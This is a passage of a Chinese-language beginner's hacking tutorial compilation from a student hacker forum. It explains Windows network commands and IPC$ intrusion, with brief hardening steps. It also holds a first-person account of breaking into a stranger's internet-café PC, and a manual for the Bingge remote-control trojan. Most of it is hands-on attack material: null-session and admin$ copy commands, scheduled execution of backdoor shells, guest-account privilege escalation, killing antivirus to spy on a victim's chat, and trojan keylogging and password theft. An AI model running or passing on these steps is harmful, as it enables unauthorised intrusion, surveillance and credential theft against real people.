启动服务,或显示已启动服务的列表 NET STOP 停止网络服务 NET TIME 使计算机的时钟与另一台计算机或域的时间同步 NET USE 连接计算机或断开计算机与共享资源的连接,或显示计算机的连接信息 NET VER 显示局域网内正在使用的网络连接类型和信息 NET VIEW 显示域列表、计算机列表或指定计算机的共享资源列表 这些命令在 Win95/98 中支持的比较少,只有几个基本常见的,而在 NT 或者 2000 中又元元 多于上面的介绍,不过大多数对于初学者也没有必要掌握,所以我选择了 WindowsME 进行 介绍,其中最常用到的是 NET VIEW 和 NET USE,通过者两个命令,学习者可以连接网络 上开放了远程共享的系统,并且获得资料。这种远程共享本来是为便捷操作设计的,但是很 多网络管理员忽视了它的安全性,所以造成了很多不应该共享的信息的暴露,对于学习者来 说,则可以轻易获得它人电脑上的隐私资料。 例如在控制台下输入 net view \\202.96.50.24 则可以获得对应 IP 的系统共享目录,进而找到 他们的共享文件,当然这需要 202.96.50.24 系统的确存在共享目录,具体如何找到这些存在 共享的系统,我将会在后面的文章中进行介绍。 三、telnet 和 ftp 命令: 这两个命令分别可以远程对系统进行 telnet 登陆和 ftp 登陆,两种登陆使用的不同的协议, 分别属于两种不同的网络服务,ftp 是远程文件共享服务,也就是说学习者可以将自己的资 料上传、下载,但是它并没有过多的权利,无法在远程电脑上执行上传的文件;而 telnet 则 属于远程登陆服务,也就是说可以登陆到远程系统上,并获得一个解释器权限,拥有解释器 就意味着拥有了一定的权限,这种权限可能是基本的文件操作、也可能是可以控制系统的管 理员权限。 ================================================== 四、netstat 命令: 这个程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细 42 信息,如采用的协议类型、当前主机与远端相连主机(一个或多个)的 IP 地址以及它们之 间的连接状态等。 使用 netstat ?可以显示它的命令格式和参数说明: netstat [-a] [-e] [-n] [-s] [-p proto] [-r] [interval] 其中的参数说明如下: -a 显示所有主机的端口号; -e 显示以太网统计信息; -n 以数字表格形式显示地址和端口; -p proto 显示特定的协议的具体使用信息; -r 显示本机路由表的内容; -s 显示每个协议的使用状态(包括 TCP、UDP、IP); interval 重新显示所选的状态,每次显示之间的间隔数(单位秒)。 netstat 命令的主要用途是检测本地系统开放的端口,这样做可以了解自己的系统开放了什么 服务、还可以初步推断系统是否存在木马,因为常见的网络服务开放的默认端口轻易不会被 木马占用,例如:用于 FTP(文件传输协议)的端口是 21;用于 TELNET(远程登录协议) 的端口是 23;用于 SMTP(邮件传输协议)的端口是 25;用于 DNS(域名服务,即域名与 IP 之间的转换)的端口是 53;用于 HTTP(超文本传输协议)的端口是 80;用于 POP3(电 子邮件的一种接收协议)的端口是 110;WINDOWS 中开放的端口是 139,除此以外,如果 系统中还有其他陌生的到口,就可能是木马程序使用的了。通过 netstat 或者 netstat -a 可以 观察开放的端口,如果发现下面的端口,就说明已经有木马程序在系统中存在: 31337 号端口是 BackOffice 木马的默认端口;1999 是 Yai 木马程序;2140 或者 3150 都是 DEEP THROAT 木马使用的端口;还有 NETBUS、冰河或者 SUB7 等木马程序都可以自定义 端口,因此发现了陌生端口一定要提高警惕,使用防火墙或者查病毒软件进行检测。 五、tracert 命令: 这个命令的功能是判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单 和到达时间。tracert 命令的格式如下: tracert [-d] [-h maximum_hops] [-j host-list] [-w timeout] target_name 命令行中的参数-d 是要求 tracert 不对主机名进行解析,-h 是指定搜索到目的地址的最大轮 数,-j 的功能是沿着主机列表释放源路由,-w 用来设置超时时间间隔。 通过 tracert 可以判断一个服务器是属于国内还是国际(网络服务器的物理未知不能依*域名 进行判断),根据路由路经可以判断信息从自己的系统发送到网络上,先后经过了哪些 IP 到 大对方服务器,这就好像乘公共汽车的时候从起点出发到达终点站的时候,中途会出现很多 路牌一个道理,我们清楚了自己的信息的传送路径,才能够更清晰的了解网络、对服务器进 行攻击。 六、winipcfg: winipcfg 和 ipconfig 都是用来显示主机内 IP 协议的配置信息。只是 winipcfg 适用于 Windows 95/98,而 ipconfig 适用于 Windows NT。winipcfg 不使用参数,直接运行它,它就会采用 Windows 窗口的形式显示具体信息。这些信息包括:网络适配器的物理地址、主机的 IP 地 址、子网掩码以及默认网关等,点击其中的“其他信息”,还可以查看主机的相关信息如: 主机名、DNS 服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有 用。 ipconfig 的命令格式如下:ipconfig [/? | /all | /release [adapter] | /renew [adapter]] 43 其中的参数说明如下: 使用不带参数的 ipconfig 命令可以得到以下信息:IP 地址、子网掩码、默认网关。而使用 ipconfig /? 显示 ipconfig 的格式和参数的英文说明; /all 显示所有的配置信息; /release 为指定的适配器(或全部适配器)释放 IP 地址(只适用于 DHCP); /renew 为指定的适配器(或全部适配器)更新 IP 地址(只适用于 DHCP)。 /all,则可以得到更多的信息:主机名、DNS 服务器、节点类型、网络适配器的物理地址、 主机的 IP 地址、子网掩码以及默认网关等。 ================================================== ipc$入侵与防范 一 前言 网上关于 ipc$入侵的文章可谓多如牛毛,而且也不乏优秀之作,攻击步骤甚至可以说已经成为 经典的模式,因此也没人愿意再把这已经成为定式的东西拿出来摆弄。 不过话虽这样说,但我个人认为这些文章讲解的并不详细,对于第一次接触 ipc$的菜鸟来说, 简单的罗列步骤并不能解答他们的许多迷惑。 二 什么是 ipc$ IPC$(Internet Process Connection)是共享"命名管道"的资源(大家都是这么说的),它是为了让 进程间通信而开放的命名管道,可以通过验证用户名和密码获得相应的权限,在远程管理计 算机和查看计算机的共享资源时使用。 利用 IPC$,连接者甚至可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机 器必须开了 ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标 主机上的用户列表(不过负责的管理员会禁止导出用户列表的)。 我们总在说 ipc$漏洞 ipc$漏洞,其实,ipc$并不是真正意义上的漏洞,它是为了方便管理员的远 程管理而开放的远程网络登陆功能,而且还打开了默认共享,即所有的逻辑盘(c$,d$,e$......)和 系统目录 winnt 或 windows(admin$)。 所有的这些,初衷都是为了方便管理员的管理,但好的初衷并不一定有好的收效,一些别有用 心者(到底是什么用心?我也不知道,代词一个)会利用 IPC$,访问共享资源,导出用户列表,并 使用一些字典工具,进行密码探测,寄希望于获得更高的权限,从而达到不可告人的目的。 解惑: 1)IPC 连接是 Windows NT 及以上系统中特有的远程网络登陆功能,其功能相当于 Unix 中的 44 Telnet,由于 IPC$功能需要用到 Windows NT 中的很多 DLL 函数,所以不能在 Windows 9.x 中运行。 也就是说只有 nt/2000/xp 才可以建立 ipc$连接,98/me 是不能建立 ipc$连接的(但有些朋友说 在 98 下能建立空的连接,不知道是真是假,不过现在都 2003 年了,建议 98 的同志换一下系统 吧,98 不爽的) 2)即使是空连接也不是 100%都能建立成功,如果对方关闭了 ipc$共享,你仍然无法建立连接 3)并不是说建立了 ipc$连接就可以查看对方的用户列表,因为管理员可以禁止导出用户列表 三 建立 ipc$连接在 hack 攻击中的作用 就像上面所说的,即使你建立了一个空的连接,你也可以获得不少的信息(而这些信息往往是 入侵中必不可少的),访问部分共享,如果你能够以某一个具有一定权限的用户身份登陆的话, 那么你就会得到相应的权限,显然,如果你以管理员身份登陆,嘿嘿,就不用我在多说了吧,what u want,u can do!! (基本上可以总结为获取目标信息、管理目标进程和服务,上传木马并运行,如果是 2000server, 还可以考虑开启终端服务方便控制.怎么样?够厉害吧!) 不过你也不要高兴的太早,因为管理员的密码不是那么好搞到的,虽然会有一些傻傻的管理员 用空口令或者弱智密码,但这毕竟是少数,而且现在不比从前了,随着人们安全意识的提高,管 理员们也愈加小心了,得到管理员密码会越来越难的 因此今后你最大的可能就是以极小的权限甚至是没有权限进行连接,你会慢慢的发现 ipc$连 接并不是万能的,甚至在主机不开启 ipc$共享时,你根本就无法连接。 所以我认为,你不要把 ipc$入侵当作终极武器,不要认为它战无不胜,它就像是足球场上射门 前的传球,很少会有致命一击的效果,但却是不可缺少的,我觉得这才是 ipc$连接在 hack 入侵 中的意义所在。 四 ipc$与空连接,139,445 端口,默认共享的关系 以上四者的关系可能是菜鸟很困惑的一个问题,不过大部分文章都没有进行特别的说明,其实 我理解的也不是很透彻,都是在与大家交流中总结出来的.(一个有良好讨论氛围的 BBS 可以 说是菜鸟的天堂) 1)ipc$与空连接: 不需要用户名与密码的 ipc$连接即为空连接,一旦你以某个用户或管理员的身份登陆(即以特 定的用户名和密码进行 ipc$连接),自然就不能叫做空连接了。 许多人可能要问了,既然可以空连接,那我以后就空连接好了,为什么还要费九牛二虎之力去 扫描弱口令,呵呵,原因前面提到过,当你以空连接登陆时,你没有任何权限(很郁闷吧),而你以 45 用户或管理员的身份登陆时,你就会有相应的权限(有权限谁不想呀,所以还是老老实实扫吧, 不要偷懒哟)。 2)ipc$与 139,445 端口: ipc$连接可以实现远程登陆及对默认共享的访问;而 139 端口的开启表示 netbios 协议的应用, 我们可以通过 139,445(win2000)端口实现对共享文件/打印机的访问,因此一般来讲,ipc$连接 是需要 139 或 445 端口来支持的。 3)ipc$与默认共享 默认共享是为了方便管理员远程管理而默认开启的共享(你当然可以关闭它),即所有的逻辑 盘(c$,d$,e$......)和系统目录 winnt 或 windows(admin$),我们通过 ipc$连接可以实现对这些默 认共享的访问(前提是对方没有关闭这些默认共享) 五 ipc$连接失败的原因 以下 5 个原因是比较常见的: 1)你的系统不是 NT 或以上操作系统; 2)对方没有打开 ipc$默认共享 3)对方未开启 139 或 445 端口(惑被防火墙屏蔽) 4)你的命令输入有误(比如缺少了空格等) 5)用户名或密码错误(空连接当然无所谓了) 另外,你也可以根据返回的错误号分析原因: 错误号 5,拒绝访问 : 很可能你使用的用户不是管理员权限的,先提升权限; 错误号 51,Windows 无法找到网络路径 : 网络有问题; 错误号 53,找不到网络路径 : ip 地址错误;目标未开机;目标 lanmanserver 服务未启动; 目标有防火墙(端口过滤); 错误号 67,找不到网络名 : 你的 lanmanworkstation 服务未启动;目标删除了 ipc$; 错误号 1219,提供的凭据与已存在的凭据集冲突 : 你已经和对方建立了一个 ipc$,请删 除再连。 错误号 1326,未知的用户名或错误密码 : 原因很明显了; 错误号 1792,试图登录,但是网络登录服务没有启动 : 目标 NetLogon 服务未启动。(连 接域控会出现此情况) 错误号 2242,此用户的密码已经过期 : 目标有帐号策略,强制定期要求更改密码。 关于 ipc$连不上的问题比较复杂,除了以上的原因,还会有其他一些不确定因素,在此本人无 法详细而确定的说明,就*大家自己体会和试验了。 六如何打开目标的 IPC$(此段引自相关文章) 首先你需要获得一个不依赖于 ipc$的 shell,比 如 sql 的 cmd 扩展、telnet、木 马 ,当 然 ,这 shell 必须是 admin 权限的,然后你可以使用 shell 执行命令 net share ipc$ 来开放目标的 ipc$。从 46 上面可以知道,ipc$能否使用还有很多条件。请确认相关服务都已运行,没有就启动它(不 知道怎么做的请看 net 命令的用法),还是不行的话(比如有防火墙,杀不了)建议放弃。 七如何防范 ipc$入侵 1 禁止空连接进行枚举(此操作并不能阻止空连接的建立,引自《解剖 win2000 下的空会话》) 首先运行 regedit,找到如下组建 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA]把 RestrictAnonymous = DWORD 的键值改为:00000001(如果设置为 2 的话,有一些问题会发生,比如一些 WIN 的 服务出现问题等等) 2 禁止默认共享 1)察看本地共享资源 运行-cmd-输入 net share 2)删除共享(每次输入一个) net share ipc$ /delete net share admin$ /delete net share c$ /delete net share d$ /delete(如果有 e,f,......可以继续删除) 3)停止 server 服务 net stop server /y (重新启动后 server 服务会重新开启) 4)修改注册表 运行-regedit server 版 : 找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] 把 AutoShareServer(DWORD)的键值改为:00000000。 pro 版 : 找到如下主键 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters] 把 AutoShareWks(DWORD)的键值改为:00000000。 如果上面所说的主键不存在,就新建(右击-新建-双字节值)一个主健再改键值。 3 永久关闭 ipc$和默认共享依赖的服务:lanmanserver 即 server 服务 控制面板-管理工具-服务-找到 server 服务(右击)-属性-常规-启动类型-已禁用 4 安装防火墙(选中相关设置),或者端口过滤(滤掉 139,445 等),或者用新版本的优化大师 5 设置复杂密码,防止通过 ipc$穷举密码 八 相关命令 1)建立空连接: net use \\IP\ipc$ "" /user:""(一定要注意:这一行命令中包含了 3 个空格) 2)建立非空连接: net use \\IP\ipc$ "用户名" /user:"密码" (同样有 3 个空格) 3)映射默认共享: net use z: \\IP\c$ "密码" /user:"用户名" (即可将对方的 c 盘映射为自己的 z 盘,其他盘 47 类推) 如果已经和目标建立了 ipc$,则可以直接用 IP+盘符+$访问,具体命令 net use z: \\IP\c$ 4)删除一个 ipc$连接 net use \\IP\ipc$ /del 5)删除共享映射 net use c: /del 删除映射的 c 盘,其他盘类推 net use * /del 删除全部,会有提示要求按 y 确认 九 经典入侵模式 这个入侵模式太经典了,大部分 ipc 教程都有介绍,我也就拿过来引用了,在此感谢原创作 者!(不知道是哪位前辈) 1. C:\>net use \\127.0.0.1\IPC$ "" /user:"admintitrators" 这是用《流光》扫到的用户名是 administrators,密码为"空"的 IP 地址(空口令?哇,运气好到 家了),如果是打算攻击的话,就可以用这样的命令来与 127.0.0.1 建立一个连接,因为密码 为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入 administrators, 命令即可成功完成。 2. C:\>copy srv.exe \\127.0.0.1\admin$ 先复制 srv.exe 上去,在流光的 Tools 目录下就有(这里的$ 是指 admin 用户的 c:\winnt\system32\,大家还可以使用 c$、d$,意思是 C 盘与 D 盘,这看你要复制到什么地 方去了)。 3. C:\>net time \\127.0.0.1 查查时间,发现 127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。 4. C:\>at \\127.0.0.1 11:05 srv.exe 用 at 命令启动 srv.exe 吧(这里设置的时间要比主机时间快,不然你怎么启动啊,呵呵!) 5. C:\>net time \\127.0.0.1 再查查到时间没有?如果 127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下 面的命令。 6. C:\>telnet 127.0.0.1 99 这里会用到 Telnet 命令吧,注意端口是 99。Telnet 默认的是 23 端口,但是我们使用的是 SRV 在对方计算机中为我们建立一个 99 端口的 Shell。 虽然我们可以 Telnet 上去了,但是 SRV 是一次性的,下次登录还要再激活!所以我们打算 建立一个 Telnet 服务!这就要用到 ntlm 了 7.C:\>copy ntlm.exe \\127.0.0.1\admin$ 用 Copy 命令把 ntlm.exe 上传到主机上(ntlm.exe 也是在《流光》的 Tools 目录中)。 8. C:\WINNT\system32>ntlm 输入 ntlm 启动(这里的 C:\WINNT\system32>指的是对方计算机,运行 ntlm 其实是让这个 程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启 Telnet 服务! 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在 DOS 上操作一样简单! (然后你想做什么?想做什么就做什么吧,哈哈) 为了以防万一,我们再把 guest 激活加到管理组 10. C:\>net user guest /active:yes 将对方的 Guest 用户激活 48 11. C:\>net user guest 1234 将 Guest 的密码改为 1234,或者你要设定的密码 12. C:\>net localgroup administrators guest /add 将 Guest 变为 Administrator^_^(如果管理员密码更改,guest 帐号没改变的话,下次我们可以 用 guest 再次访问这台计算机) 十 总结: 关于 ipc 入侵就说这么多了,觉得已经够详细了,如果有不准确的地方,希望能与大家讨论。 ================================================================ 网吧入侵全攻略 好久都没来网吧了.今天一朋友来找我.外面有下着雪.实在没地方玩.又给溜进了网吧... 在以前家里没买电脑时.整天都泡这网吧..所以对他的系统设置什么还了解点.都大半年没来 了...不知道有啥变化.. 这网吧还不错.别的网吧都是无盘的或者就是 98 的.这里 98 和 2000 都有..呵...搞入侵可方便 了.... 无意的看到 13 号坐着两 MM...嘻....入侵也由此开始了.看能不能拿到 MM 的 QQ 号.....偶也找 了一 2000 系统的机器做下..(偶找了一角落.呵.这样比较安全点..) 打开偶可爱的 CMD..先 net name 下看看本机情况 WANGLU05 USER2000 命令成功完成。 我本机名是 WANGLU05.ping 下看看 IP 有无什么规则 Pinging wanglu05 [192.168.0.13] with 32 bytes of data: Reply from 192.168.0.13: bytes=32 timenet use //192.168.0.225/ipc$ "" /user:"user04" 命令成功完成。 网吧系统盘为 G 盘.接着映射对方 G 盘为我本地 Z 盘. G:/>net use z: //192.168.0.225/g$ 命令成功完成。 现在我的电脑里多了一个 Z 盘...图 3. 49 现在我们在这个 Z 盘里新建或删除文件.也就等于在 192.168.0.225 这个机器上操作了... 这些相信大家都知道的吧..我就不废话了..当然这些还不是我们想要的...要进一步控制她.然 后拿到 QQ 号.^_^........表说我坏.... 下面来 copy 一个木马客户端上去先...由于只是看 QQ 而已...所以我找了一个 web 控制台.体积没多大,205KB..下面是关于 webserver 的介绍./../ web 控制台 (本站不提供此类工具下载) 一个直接在 IE 栏里输入对方 IP 就可以控制对方机器的小软件,也就是所谓的 B/S 模式的控 制。用起来很方便,对方运行了服务端后,你在 IE 栏里直接输入对方 IP 就可以控制了,也 可以通过刷新来实现重复抓屏。 接着 G:/>copy webserver.exe //192.168.0.225/admin$ 已复制 1 个文件。 G:/>net time //192.168.0.225 //192.168.0.225 的当前时间是 2005/2/5 下午 05:00 命令成功完成 G:/>at //192.168.0.225 17:02 webserver.exe 用 AT 命令启动 webserver.exe. 2 分钟过后.在 IE 里输入 192.168.0.225.就可以控制对方了...可是偶一会用 net time 查看时.都 已经过了3分钟了.还是打不开....后来又重新来了一次.眼睛就盯着MM的屏幕看,才发现到了 我指定的时间.程序执行时.被瑞星给杀了... FT....我说那. 难道就没办法了吗...当然不是...可以换个别的马或加壳.修改它特征码什么的.但在网吧工具 也不是很齐全.我也懒的下.. 还好微软为我们提供了一个非常不错的系统工具....也算的上是一类控制软件了... 打开控制面板--管理工具--计算机管理 操作-连接到另一计算机. 然后输入 IP192.168.0.225 呵.等一会就可以看到成功了...你看到了什么? 更爽的是我们可以远程开启他的服务...在这里启动他的 telnet 服务. OK 了... 本地打开一 cmd 输入 G:/>telnet 192.168.0.225 回车后出现 Server allows NTLM authentication only Server has closed connection 50 需要 NTML 认证的...用小榕的那个 ntml.exe 就可以解决这一问题. ntlm.exe 在《流光》的 Tools 目录中有的... 没工具怎么办呢.. 我们在本地添加一和远程主机同样的用户名 输入 net user user04 /add 添加 user04 密码为空的用户 net localgroup administrators user04 /add 把 user04 加入管理员组 然后来到 G:/Winnt/system32 下找到 CMD.exe 右击.创建快捷方式.然后在快捷方式 CMD 右击..属性. 在以其他用户身份运行前打勾... 然后运行 快捷方式 CMD 弹出窗口.在用户名处输入 user04 密码为空 然后 telnet 192.168.0.225 回车..哈哈...拿到 shell 了.... 接下来的事就好办了...去黑基 down 了一个 knlps 命令行下杀进程的东东 copy 上去././然后 telnet 上去.在 CMD 下执行...杀掉了瑞星的进程 这下把瑞星给关了.还怕他提示有毒 接着执行 webserver.exe 在 IE 里输入 192.168.0.225 看到了.挖卡卡..开心...点那个查看屏幕..呵..MM 正在聊天... 好了她的 QQ 号码也拿到手了..加了她去聊聊去.... [ 此贴被 cy20 在 2005-11-06 00:24 重新编辑 ] [楼 主] | 发表于:2005-11-04 05:33 PM 免费自由共享 让菜鸟在校园黑客联盟起飞 WwW.SchoolHacker.CoM 51 cy20 级别: 优秀学生 精华: 1 发帖: 125 威望: 330 点 大洋: 6525 ¥ 贡献值: 0 点 在线时间:33(小时) 注册时间:2005-10-27 最后登陆:2006-02-27 -------------------------------------------------------------------------------- 木马工具详解+入门工具使用 现在我们来看看木马在黑客学习中的作用。首先学习者要明确木马究竟是什么,同时还要搞 清楚木马的类型,并且学习一些流行的木马程序的用法,这是一个相辅相成的学习进程,当 黑客利用漏洞进入服务器之后,就可以选择两条路:一、破坏系统、获得资料、显示自己; 二、利用木马为自己开辟一个合法的登录账号、掌管系统、利用被入侵系统作为跳板继续攻 击其他系统。 由此看来,木马程序是为第二种情况涉及的一种可以远程控制系统的程序,根据实现木马程 序的目的,可以知道这种程序应该具有以下性质: 1、伪装性:程序将自己的服务端伪装成合法程序,并且具有诱惑力的让被攻击者执行,在 程序被激活后,木马代码会在未经授权的情况下运行并装载到系统开始运行进程中; 2、隐藏性:木马程序通病毒程序一样,不会暴露在系统进程管理器内,也不会让使用者察 觉到木马的存在,它的所有动作都是伴随其他程序的运行进行的,因此在一般情况下使用者 很难发现系统中木马的存在; 3、破坏性:通过远程控制,黑客可以通过木马程序对系统中的文件进行删除、编辑操作, 还可以进行诸如格式化硬盘、改变系统启动参数等恶性破坏操作; 4、窃密性:木马程序最大的特点就是可以窥视被入侵电脑上的所有资料,这不仅包括硬盘 上的文件,还包括显示器画面、使用者在操作电脑过程中在硬盘上输入的所有命令等。 看了上面的介绍,学习者应该对木马程序的用途有了一个初步了解,并且区分清除木马程序 和病毒之间的相同点和不同点,由于黑客手段的日益增多,许多新出现的黑客手段(例如 52 D.O.S)经常会让学习者思维混乱,但实际上这些新出现的黑客手段都是从最开始的溢出、 木马演变出来的,因而对于初学者来说,并不需要急于接触过多的新技术,而是要对最基本 的也是最有效的黑客技术进行深入学习。 一、木马的原理: 大多数木马程序的基本原理都是一样的,他们是由两个程序配合使用——被安装在入侵系统 内的 Server 程序;另一个是对 Server 其控制作用的 Client 程序。学习者已经了解了木马和 病毒的区别,大多数 Server 程序不会像病毒一样主动传播,而是潜伏在一些合法程序内部, 然后由目标操作者亲手将其安装到系统中,虽然这一切都是没有经过目标操作者授权的,然 而从某种程度上说,这的确是在经过诱惑后目标“心甘情愿”接收木马的,当 Server 安装 成功后,黑客就可以通过 Client 控制程序对 Server 端进行各种操作了。 木马程序的 Server 端为了隐藏自己,必须在设计中做到不让自己显示到任务栏或者系统进 程控制器中,同时还不会影响其他程序的正常运行,当使用者电脑处于断线状态下,Server 段不会发送任何信息到预设的端口上,而会自动检测网络状态直到网络连接好,Server 会通 过 email 或者其他形式将 Server 端系统资料通知 Client 端,同时接收 Client 发送出来的请求。 二.木马实战: 先说国产木马老大,冰河-----你不得不了解的工具。 (编者残语:)说到冰河,也许在 2005 年的今天显得很落后,但冰河创造了一个时代,一个 人人能做黑客的时代。使用方便简单,人人都能上手。图形界面,中文菜单,了解木马,先 从了解远程控制软件冰河开始。 ====================================================== 使用冰河前,请注意:如果你的机器有杀毒软件,可能会出现病毒提示。说实话,他还真是 一个病毒。呵呵。所以在使用前,请慎重考虑,出了问题,小编可担当不起。建议使用不管 是客户端还是服务端都请关闭杀毒软件以达到更好的使用效果。 ====================================================== 软件功能概述: 该软件主要用于远程监控,具体功能包括: 1.自动跟踪目标机屏幕变化,同时可以完全模拟键盘及鼠标输入,即在同步被控端屏幕变化 的同时,监控端的一切键盘及鼠标操作将反映在被控端屏幕(局域网适用); 2.记录各种口令信息:包括开机口令、屏保口令、各种共享资源口令及绝大多数在对话框 中出现过的口令信息,且 1.2 以上的版本中允许用户对该功能自行扩充,2.0 以上版本还同 时提供了击键记录功能; 53 3.获取系统信息:包括计算机名、注册公司、当前用户、系统路径、操作系统版本、当前 显示分辨率、物理及逻辑磁盘信息等多项系统数据; 4.限制系统功能:包括远程关机、远程重启计算机、锁定鼠标、锁定系统热键及锁定注册 表等多项功能限制; 5.远程文件操作:包括创建、上传、下载、复制、删除文件或目录、文件压缩、快速浏览 文本文件、远程打开文件(提供了四中不同的打开方式——正常方式、最大化、最小化和隐 藏方式)等多项文件操作功能; 6.注册表操作:包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表操 作功能; 7.发送信息:以四种常用图标向被控端发送简短信息; 8.点对点通讯:以聊天室形式同被控端进行在线交谈。 一.文件列表: 1. G_Server.exe: 被监控端后台监控程序(运行一次即自动安装,可任意改名),在安装前可以 先通过'G_Client'的'配置本地服务器程序'功能进行一些特殊配置,例如是否将动态 IP 发送到 指定信箱、改变监听端口、设置访问口令等); 2. G_Client.exe: 监控端执行程序,用于监控远程计算机和配置服务器程序。 二.准备工作: 冰河是一个基于 TCP/IP 协议和 WINDOWS 操作系统的网络工具,所以首先应确保该协议已 被安装且网络连接无误,然后配置服务器程序(如果不进行配置则取默认设置),并在欲监控 的计算机上运行服务器端监控程序即可。 三.升级方法: 由于冰河 2.0 的改版较大,所以 2.0 以后版本与以前各版本完全不兼容。为此只能向老用户 提供一套升级方案:对于 1.1 版本的用户(好象已经没什么人用了),可以先用 1.1 或 1.2 版的 CLIENT 端将新版本的 SERVER 程序上传至被监控端,然后执行'文件打开'命令即可;对于 1.2 版本的用户相对简单,只要通过 1.2 版的 CLIENT 远程打开新版本的 SERVER 程序就可 以自动升级了。2.0 以后的各版本完全兼容。 'DARKSUN 专版'中还提供了另一种升级方法,可以免去在不同版本中切换的麻烦。如果您 不能确定远程主机的冰河版本,在用'文件管理器'浏览目录前,最好先在工具栏下的'当前连 接'列表框中选择打算连接的主机,然后直接点'升级 1.2 版本'按钮进行升级,如果返回的信 息是'无法解释的命令',那说明远程主机安装了 2.0 以上版本,具体的版本及系统信息可以 54 通过'命令控制台'的'口令类命令\系统信息及口令\系统信息'来查看。 四.各模块简要说明: 安装好服务器端监控程序后,运行客户端程序就可以对远程计算机进行监控了,客户端执行 程序的各模块功能如下: 1. "添加主机": 将被监控端 IP 地址添加至主机列表,同时设置好访问口令及端口,设置将保 存在'Operate.ini'文件中,以后不必重输。如果需要修改设置,可以重新添加该主机,或在主 界面工具栏内重新输入访问口令及端口并保存设置; 2. "删除主机": 将被监控端 IP 地址从主机列表中删除(相关设置也将同时被清除); 3. "自动搜索": 搜索指定子网内安装有'冰河'的计算机。(例如欲搜索 IP 地址'192.168.1.1'至 '192.168.1.255'网段的计算机,应将'起始域'设为'192.168.1',将'起始地址'和'终止地址'分别设为 '1'和'255'); 4. "查看屏幕": 查看被监控端屏幕(相当于命令控制台中的'控制类命令\捕获屏幕\查看屏幕 '); 5. "屏幕控制": 远程模拟鼠标及键盘输入(相当于命令控制台中的'控制类命令\捕获屏幕\屏 幕控制')。其余同"查看屏幕"; 6. "冰河信使": 点对点聊天室,也就是传说中的'二人世界'; 7. "升级 1.2 版本": 通过'DARKSUN 专版'的冰河来升级远程 1.2 版本的服务器程序; 8. "修改远程配置": 在线修改访问口令、监听端口等服务器程序设置,不需要重新上传整个 文件,修改后立即生效; 9. "配置本地服务器程序": 在安装前对'G_Server.exe'进行配置(例如是否将动态 IP 发送到指 定信箱、改变监听端口、设置访问口令等)。 五.文件管理器操作说明: 文件管理器对文件操作提供了下列鼠标操作功能: 1. 文件上传:右键单击欲上传的文件,选择'复制',在目的目录中粘贴即可。也可以在目的 目录中选择'文件上传自',并选定欲上传的文件; 2. 文件下载:右键单击欲下载的文件,选择'复制',在目的目录中粘贴即可。也可以在选定 欲下载的文件后选择'文件下载至',并选定目的目录及文件名; 3. 打开远程或本地文件:选定欲打开的文件,在弹出菜单中选择'远程打开'或'本地打开',对 55 于可执行文件若选择了'远程打开',可以进一步设置文件的运行方式和运行参数(运行参数可 为空); 4. 删除文件或目录:选定欲删除的文件或目录,在弹出菜单中选择'删除'; 5. 新建目录:在弹出菜单中选择'新建文件夹'并输入目录名即可; 6. 文件查找:选定查找路径,在弹出菜单中选择'文件查找',并输入文件名即可(支持通配符); 7. 拷贝整个目录(只限于被监控端本机):选定源目录并复制,选定目的目录并粘贴即可。 六.命令控制台主要命令: 1. 口令类命令: 系统信息及口令、历史口令、击键记录; 2. 控制类命令: 捕获屏幕、发送信息、进程管理、窗口管理、鼠标控制、系统控制、其它控 制(如'锁定注册表'等); 3. 网络类命令: 创建共享、删除共享、查看网络信息; 4. 文件类命令: 目录增删、文本浏览、文件查找、压缩、复制、移动、上传、下载、删除、 打开(对于可执行文件则相当于创建进程); 5. 注册表读写: 注册表键值读写、重命名、主键浏览、读写、重命名; 6. 设置类命令: 更换墙纸、更改计算机名、读取服务器端配置、在线修改服务器配置。 七.使用技巧: 1. 用'查看屏幕'命令抓取对方屏幕信息后,若希望程序自动跟踪对方的屏幕变化,在右键弹出 菜单中选中'自动跟踪'项即可; 2. 在文件操作过程中,鼠标双击本地文件将在本地开该文件;鼠标双击远程文件将先下载该 文件至临时目录,然后在本地打开; 3. 在使用'网络共享创建'命令时,如果不希望其他人看到新创建的共享名,可以在共享名后 加上'$'符号。自己欲浏览时只要在 IE 的地址栏或'开始菜单'的'运行'对话框内键入'\\[机器 名]\[共享名(含'$'符号)]即可; 4. 在 1.2 以后的版本中允许用户设定捕获图像的色深(1~7 级),图像将按设定保存为 2 的 N 次方种颜色(N=2 的[1~7]次方),即 1 级为单色,2 级为 16 色,3 级为 256 色,依此类推。 需要说明的是如果将色深设为 0 或 8 则表示色深依被监控端当前的分辨率而定,适当减小色 深可以提高图像的传输速度。 56 2.1 以后的版本新增了以 JPEG 格式传输图像的功能,以利于在 INTERNET 上传输图像,但 这项功能只适用于 2.1 以上版本(制被控端),否则实际上仍是通过 BMP 图象格式传输,所以 请先确认版本后再使用。 八.常见问题: 1. 安装不成功,该问题通常是由于 TCP/IP 协议安装或设置不正确所致; 2. 被监控端启动时或与监控端连接时弹出'建立连接'对话框,该问题是由于系统设置了自动 拨号属性。可以通过安装前定制服务器程序来禁止自动拨号; 3. 可以连接但没有反应,通常是版本不匹配所致,因为 1.2 以前的版本设计上存在缺陷,所 以如果您不能确定远程主机的冰河版本,最好先按照前面所说的升级办法试一下,否则被监 控端可能会出现错误提示。另外冰河没有提供代理功能,局域网外无法监控局域网内的机器, 除非被控端是网关; 4. '更换墙纸'命令无效,这个问题的可能性太多了,较常见的原因是被监控端的桌面设置为' 按 WEB 页查看'; 5. 对被监控端进行文件或目录的增删操作后,少数情况不会自动刷新,可以通过[Ctrl+R]或 选择弹出菜单的'刷新'命令手动刷新; 6. 开机口令不正确,因为 CMOS 